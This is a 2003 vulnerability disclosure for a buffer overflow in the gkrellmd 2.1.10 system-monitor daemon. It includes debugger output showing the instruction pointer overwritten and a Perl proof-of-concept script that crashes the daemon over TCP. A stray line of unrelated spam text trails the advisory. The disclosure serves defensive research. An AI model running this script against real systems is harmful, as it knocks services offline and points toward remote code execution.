Gkrellmd 2.1.10 remote exploit (buffer overflow) date: 22-06-2003 author: dodo [dodo@darkwired.ath.cx] aurhor-url: https://darkwired.ath.cx/ - Description: Gkrellm is a GTK system monitoring utility, the latest version comes with a daemon. It's a great peace of software, however the daemon needs more secure code. gkrellm/gkrellmd: http://www.gkrellm.net/ - Exploitation: when someone sends data to the gkrellmd, gkrellmd uses buffers to store this data, however, it doesn't check for the maximum buffersize (128bytes). This could result in remote executing of code and crashing the daemon. - Details: verbose gkrellmd output: cyride-bash# gkrellmd -P 661 -V update_HZ=3 connect string from client: gkrellm 2.1.10 gkrellmd accepted client: dwop.darkwired.da.ru:43755 received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault (core dumped) debugger output (eip): cyride-bash# gdb gkrellmd gkrellmd.core (gdb) info reg eip 0x41414141 0x41414141 - Proof of concept: gkrellmcrash.pl: #!/usr/bin/perl -s use IO::Socket; # # proof of concept code # tested: grkellmd 2.1.10 # if(!$ARGV[0] || !$ARGV[1]) { print "usage: ./gkrellmcrash.pl \n"; exit(-1); } $host = $ARGV[0]; $port = $ARGV[1]; $exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; $socket = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "unable to connect to $host:$port ($!)\n" unless $socket; print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have sleep(1); print $socket $exploitstring; close($socket); - Vendor Response: vendor contacted on 22-06-2003 http://www.gkrellm.net/

亚洲欧美在线